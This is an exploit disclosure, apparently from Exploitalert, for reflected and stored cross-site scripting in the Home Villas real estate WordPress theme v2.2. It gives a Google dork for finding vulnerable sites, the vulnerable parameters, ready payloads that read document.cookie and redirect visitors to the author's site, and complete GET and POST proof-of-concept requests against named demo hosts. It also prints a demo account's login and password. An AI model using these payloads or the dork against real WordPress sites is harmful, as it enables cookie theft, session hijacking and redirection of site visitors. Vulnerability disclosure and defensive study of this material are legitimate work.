Home Villas | Real Estate WordPress Theme v2.2 - Multiple Vulnerabilities

[+] Exploit Title: Home Villas | Real Estate WordPress Theme v2.2 - Multiple Vulnerabilities
[+] Google Dork: inurl:/wp-content/themes/homevillas-real-estate/
[+] Date: 2020-07-24
[+] Exploit Author: Vlad Vector [ https://vladvector.ru ]
[+] Vendor: Chimp Studio [ https://chimpgroup.com ]
[+] Software Version: 2.2
[+] Software Link: https://themeforest.net/item/home-villa-real-estate-wordpress-theme/19446059
[+] Tested on: Debian 10
[+] CVE: 
[+] CWE: CWE-79



### [ Info: ]

[i] An Unauthenticated Reflected & Authenticated Persistent XSS vulnerabilities was discovered in the Home Villas theme through 2.2 for WordPress.

[i] Demo account @ houseplanng.com: pocuser / 1rNeg6x7fEDp (login / password)

[i] PoC property URL: https://houseplanng.com/properties/1-4/

[i] PoC Member Profile URL: https://houseplanng.com/members/poc-user/



### [ Vulnerabilities: ]

[x] Unauthenticated Reflected XSS -> Vulnerable parameters: property_type, location, search_type, property_category, min-beds, min-bath, min-garage

[x] Unauthenticated Reflected XSS in /compare-properties/?type=5684&properties_ids=13[payload],88

[x] Authenticated Persistent XSS on Property page -> House Plan Summary text area

[x] Authenticated Persistent XSS on Member Profile page -> Biography text area



### [ Payloads: ]

[$] "><!--<img src="--><img src=x onerror=(alert)(`VLDVCTOR`);(alert)(document.cookie);window.location=`https://vladvector.ru/`;//">

[$] "><img src=x onerror=(alert)(`VLAD\x20VECTOR`);(alert)(document.cookie);window.location='https://vladvector.ru/';>

[$] <Input/Autofocus/%0D*/Onfocus=(alert)(`VLD\x20VCTOR`);window.location=`https://vladvector.ru/`;>



### [ PoC Unauthenticated Reflected XSS with all vulnerable parameters: ]

[!] https://homevillas.chimpgroup.com/property-medium/?property_type=%22%3E%3C!--%3Cimg%20src=%22--%3E%3Cimg%20src=x%20onerror=(alert)(`property_type`);//%22%3E&location=%22%3E%3C!--%3Cimg%20src=%22--%3E%3Cimg%20src=x%20onerror=(alert)(`location`);//%22%3E&search_type=%22%3E%3C!--%3Cimg%20src=%22--%3E%3Cimg%20src=x%20onerror=(alert)(`search_type`);//%22%3E&property_category=%22%3E%3C!--%3Cimg%20src=%22--%3E%3Cimg%20src=x%20onerror=(alert)(`property_category`);//%22%3E&min-beds=%22%3E%3C!--%3Cimg%20src=%22--%3E%3Cimg%20src=x%20onerror=(alert)(`min-beds`);//%22%3E&min-bath=%22%3E%3C!--%3Cimg%20src=%22--%3E%3Cimg%20src=x%20onerror=(alert)(`min-bath`);//%22%3E&min-garage=%22%3E%3C!--%3Cimg%20src=%22--%3E%3Cimg%20src=x%20onerror=(alert)(`min-garage`);//%22%3E&advanced_search=true

[!] GET /property-medium/?property_type=%22%3E%3C!--%3Cimg%20src=%22--%3E%3Cimg%20src=x%20onerror=(alert)(`property_type`);//%22%3E&location=%22%3E%3C!--%3Cimg%20src=%22--%3E%3Cimg%20src=x%20onerror=(alert)(`location`);//%22%3E&search_type=%22%3E%3C!--%3Cimg%20src=%22--%3E%3Cimg%20src=x%20onerror=(alert)(`search_type`);//%22%3E&property_category=%22%3E%3C!--%3Cimg%20src=%22--%3E%3Cimg%20src=x%20onerror=(alert)(`property_category`);//%22%3E&min-beds=%22%3E%3C!--%3Cimg%20src=%22--%3E%3Cimg%20src=x%20onerror=(alert)(`min-beds`);//%22%3E&min-bath=%22%3E%3C!--%3Cimg%20src=%22--%3E%3Cimg%20src=x%20onerror=(alert)(`min-bath`);//%22%3E&min-garage=%22%3E%3C!--%3Cimg%20src=%22--%3E%3Cimg%20src=x%20onerror=(alert)(`min-garage`);//%22%3E&advanced_search=true HTTP/1.1
Host: homevillas.chimpgroup.com



### [ PoC Unauthenticated Reflected XSS in /compare-properties/: ]

[!] https://homevillas.chimpgroup.com/compare-properties/?type=5684&properties_ids=13%22%3E%3C!--%3Cimg%20src=%22--%3E%3Cimg%20src=x%20onerror=(alert)(`VL%CE%9BDV%CE%9ECTOR`);window.location=`https://vladvector.ru/`;//%22%3Ex,88x

[!] GET /compare-properties/?type=5684&properties_ids=13%22%3E%3C!--%3Cimg%20src=%22--%3E%3Cimg%20src=x%20onerror=(alert)(`VL%CE%9BDV%CE%9ECTOR`);window.location=`https://vladvector.ru/`;//%22%3Ex,88x HTTP/1.1
Host: homevillas.chimpgroup.com



### [ PoC Authenticated Persistent XSS -> Property page: ]

[!] POST /wp-admin/admin-ajax.php HTTP/1.1
Host: houseplanng.com
Referer: https://houseplanng.com/ad-new-property/?
X-Requested-With: XMLHttpRequest
Content-Type: multipart/form-data; boundary=---------------------------331731252912908677314128703645
Content-Length: 5012
Origin: https://houseplanng.com
Cookie: [cookies_here]

-----------------------------331731252912908677314128703645
Content-Disposition: form-data; name="wp_rem_property_gallery_images[0]"; filename="1.jpg"
Content-Type: image/png

OK
-----------------------------331731252912908677314128703645
Content-Disposition: form-data; name="wp_rem_property_type"

house-plans
-----------------------------331731252912908677314128703645
Content-Disposition: form-data; name="wp_rem_property_new_package_used"

on
-----------------------------331731252912908677314128703645
Content-Disposition: form-data; name="wp_rem_property_package"

5703
-----------------------------331731252912908677314128703645
Content-Disposition: form-data; name="wp_rem_phone_number_property"

PoC
-----------------------------331731252912908677314128703645
Content-Disposition: form-data; name="wp_rem_property_category[parent]"

PoC
-----------------------------331731252912908677314128703645
Content-Disposition: form-data; name="wp_rem_cus_field[bedroom]"

1
-----------------------------331731252912908677314128703645
Content-Disposition: form-data; name="wp_rem_cus_field[bathroom]"

1
-----------------------------331731252912908677314128703645
Content-Disposition: form-data; name="wp_rem_cus_field[area]"

1
-----------------------------331731252912908677314128703645
Content-Disposition: form-data; name="wp_rem_cus_field[storey]"

1
-----------------------------331731252912908677314128703645
Content-Disposition: form-data; name="wp_rem_cus_field[depth]"

1
-----------------------------331731252912908677314128703645
Content-Disposition: form-data; name="wp_rem_cus_field[width]"

1
-----------------------------331731252912908677314128703645
Content-Disposition: form-data; name="wp_rem_property_title"

1
-----------------------------331731252912908677314128703645
Content-Disposition: form-data; name="wp_rem_property_desc"

1
-----------------------------331731252912908677314128703645
Content-Disposition: form-data; name="wp_rem_property_summary"

"><img src=x onerror=(alert)(`VLAD\x20VECTOR`);(alert)(document.cookie);window.location='https://vladvector.ru/';>
-----------------------------331731252912908677314128703645
Content-Disposition: form-data; name="property_tags[]"


-----------------------------331731252912908677314128703645
Content-Disposition: form-data; name="wp_rem_property_price_options"

price
-----------------------------331731252912908677314128703645
Content-Disposition: form-data; name="wp_rem_phone_number_property_frontend"


-----------------------------331731252912908677314128703645
Content-Disposition: form-data; name="wp_rem_property_price"

1
-----------------------------331731252912908677314128703645
Content-Disposition: form-data; name="wp_rem_price_type"

Offers in region of
-----------------------------331731252912908677314128703645
Content-Disposition: form-data; name="wp_rem_property_video"


-----------------------------331731252912908677314128703645
Content-Disposition: form-data; name="wp_rem_property_virtual_tour"


-----------------------------331731252912908677314128703645
Content-Disposition: form-data; name="faq_title"


-----------------------------331731252912908677314128703645
Content-Disposition: form-data; name="faq_desc"


-----------------------------331731252912908677314128703645
Content-Disposition: form-data; name="faq_title"

1
-----------------------------331731252912908677314128703645
Content-Disposition: form-data; name="faq_desc"


-----------------------------331731252912908677314128703645
Content-Disposition: form-data; name="faq_counter"


-----------------------------331731252912908677314128703645
Content-Disposition: form-data; name="trans_first_name"

1
-----------------------------331731252912908677314128703645
Content-Disposition: form-data; name="trans_last_name"

1
-----------------------------331731252912908677314128703645
Content-Disposition: form-data; name="trans_email"

[email protected]
-----------------------------331731252912908677314128703645
Content-Disposition: form-data; name="trans_phone_number"

1
-----------------------------331731252912908677314128703645
Content-Disposition: form-data; name="trans_address"

1
-----------------------------331731252912908677314128703645
Content-Disposition: form-data; name="wp_rem_property_gateway"

WP_REM_WOOCOMMERCE_GATEWAY
-----------------------------331731252912908677314128703645
Content-Disposition: form-data; name="wp_rem_buy_order_flag"

1
-----------------------------331731252912908677314128703645
Content-Disposition: form-data; name="trans_id"

0
-----------------------------331731252912908677314128703645
Content-Disposition: form-data; name="term_policy"

on
-----------------------------331731252912908677314128703645
Content-Disposition: form-data; name="action"

user_and_property_meta_save
-----------------------------331731252912908677314128703645--



### [ PoC Authenticated Persistent XSS -> Member Profile page: ]

[!] POST /wp-admin/admin-ajax.php HTTP/1.1
Host: houseplanng.com
Referer: https://houseplanng.com/dashboard/?dashboard=account
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 455
Origin: https://houseplanng.com
Cookie: [cookies_here]

member_display_name=PoC+User&member_company_slug=poc-user&wp_rem_biography=%3CInput%2FAutofocus%2F%250D*%2FOnfocus%3D(alert)(%60VL%CE%9BD%5Cx20V%CE%9ECTOR%60)%3Bwindow.location%3D%60https%3A%2F%2Fvladvector.ru%2F%60%3B%3E&member_email=linabo5933%40invql.com&wp_rem_user_phone_number=1337&wp_rem_user_website=&wp_rem_user_facebook=&wp_rem_user_google_plus=&wp_rem_user_twitter=&wp_rem_user_linkedIn=&member_profile_image=&action=wp_rem_member_accounts_save



### [ Contacts: ]

[#] Website: vladvector.ru
[#] Telegram: @vladvector
[#] Twitter: @vlad_vector
[#] GitHub: @vladvector

Copyright ©2024 Exploitalert.